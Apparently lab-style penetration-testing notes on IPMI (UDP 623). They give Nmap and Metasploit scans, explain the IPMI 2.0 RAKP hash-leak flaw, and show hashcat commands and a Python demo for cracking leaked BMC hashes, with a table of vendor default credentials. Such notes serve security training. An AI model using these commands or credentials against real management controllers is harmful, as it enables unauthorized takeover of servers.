IPMI (623)

Footprinting using Nmap

IPMI listens on UDP 623, so the scan has to be a UDP scan (-sU); the ipmi-version NSE script reports the IPMI version and the supported authentication types.

sudo nmap -sU --script ipmi-version -p 623 ilo.inlanfreight.local

Metasploit version scan

use auxiliary/scanner/ipmi/ipmi_version

Flaw in the RAKP protocol in IPMI 2.0

  • during the RAKP handshake (RAKP Message 2), before the client has proven it knows the password, the BMC sends the client a salted HMAC (SHA1 or MD5, depending on the negotiated cipher suite) keyed with the user's password
  • anyone who can start a session with a valid username therefore obtains a password hash that can be cracked offline; the BMC cannot refuse this, it is part of the protocol, not a bug in one vendor's implementation

Cracking using hashcat (HP iLO default password: 8 characters, digits and uppercase letters, i.e. a 36^8 keyspace)

hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u

Cracking using hashcat (input wordlist)

hashcat -m 7300 ipmi.txt /usr/share/wordlists/rockyou.txt

Metasploit dumping hashes

use auxiliary/scanner/ipmi/ipmi_dumphashes 

After cracking, we can now login to the baseboard management controller (BMC)
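The exchange described above, as an added example that is not part of the original page: it builds the RAKP Message 2 authentication code the way a BMC does (HMAC keyed with the user's password over the session fields, in the order the IPMI 2.0 spec lists them), writes it out in the salt:hash form that hashcat mode 7300 expects and that ipmi_dumphashes prints, then performs the same offline candidate check hashcat performs. All session IDs, nonces and the GUID are constructed sample values, not a captured handshake, and the BMC user/password (root/calvin, the Dell iDRAC default from the table below) is an assumption for the demo.

```python
import hashlib
import hmac
import string

# Assumed BMC account for the demo (Dell iDRAC factory default), not a real target.
BMC_PASSWORD = b"calvin"
USERNAME = b"root"


def rakp2_salt(sid_console: bytes, sid_bmc: bytes, rand_console: bytes,
               rand_bmc: bytes, guid_bmc: bytes, priv: int, username: bytes) -> bytes:
    """Concatenate the RAKP Message 1/2 fields in the order the HMAC covers them:
    SIDm || SIDc || RandM || RandC || GUIDc || RoleM || ULengthM || UNameM.
    This concatenation is the 'salt' in the hashcat 7300 line."""
    assert len(sid_console) == 4 and len(sid_bmc) == 4
    assert len(rand_console) == 16 and len(rand_bmc) == 16 and len(guid_bmc) == 16
    return (sid_console + sid_bmc + rand_console + rand_bmc + guid_bmc
            + bytes([priv, len(username)]) + username)


def bmc_rakp2_auth_code(password: bytes, salt: bytes, algo: str = "sha1") -> bytes:
    """The Key Exchange Authentication Code the BMC places in RAKP Message 2.
    The HMAC key is the user's password, and the BMC sends this before the client
    has authenticated, which is the whole flaw."""
    return hmac.new(password, salt, getattr(hashlib, algo)).digest()


def to_hashcat_7300(salt: bytes, auth_code: bytes) -> str:
    """hashcat -m 7300 takes one 'hexsalt:hexhmac' per line."""
    return f"{salt.hex()}:{auth_code.hex()}"


def crack_7300(line: str, candidates, algo: str = "sha1"):
    """Offline check: recompute HMAC(candidate, salt) and compare, as hashcat does."""
    salt_hex, hash_hex = line.split(":")
    salt, target = bytes.fromhex(salt_hex), bytes.fromhex(hash_hex)
    for pw in candidates:
        guess = hmac.new(pw.encode(), salt, getattr(hashlib, algo)).digest()
        if hmac.compare_digest(guess, target):
            return pw
    return None


def is_ilo_default_shape(pw: str) -> bool:
    """Shape of an HP iLO factory password: 8 chars from [0-9A-Z], which is what the
    hashcat mask ?1?1?1?1?1?1?1?1 with -1 ?d?u enumerates."""
    alphabet = string.ascii_uppercase + string.digits
    return len(pw) == 8 and all(c in alphabet for c in pw)


def build_sample_line() -> str:
    """Constructed handshake values (not captured traffic) run through the BMC side."""
    salt = rakp2_salt(
        sid_console=b"\xa4\xa3\xa2\xa0",       # console session ID, constructed
        sid_bmc=b"\x02\x00\x00\x00",           # BMC session ID, constructed
        rand_console=bytes(range(16)),         # console nonce, constructed
        rand_bmc=bytes(range(16, 32)),         # BMC nonce, constructed
        guid_bmc=b"\x44" * 16,                 # BMC GUID, constructed
        priv=0x14,                             # requested privilege byte, constructed
        username=USERNAME,
    )
    return to_hashcat_7300(salt, bmc_rakp2_auth_code(BMC_PASSWORD, salt))


if __name__ == "__main__":
    line = build_sample_line()
    print("hashcat -m 7300 line:", line)
    # A wordlist of vendor defaults from the table on this page plus noise.
    print("cracked:", crack_7300(line, ["ADMIN", "password", "calvin", "changeme"]))
```

The mask attack on the page is the iLO special case of `crack_7300`: instead of a wordlist it enumerates all 36^8 strings accepted by `is_ilo_default_shape`, which is feasible because HMAC-SHA1 is fast and unsalted-per-user across the session (the salt is public in the handshake, so it does nothing to slow an attacker who already has it).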

Notes:

port 623 (UDP)

Default passwords

Product            Username        Password
Dell iDRAC         root            calvin
HP iLO             Administrator   randomized 8-character string of numbers and uppercase letters
Supermicro IPMI    ADMIN           ADMIN
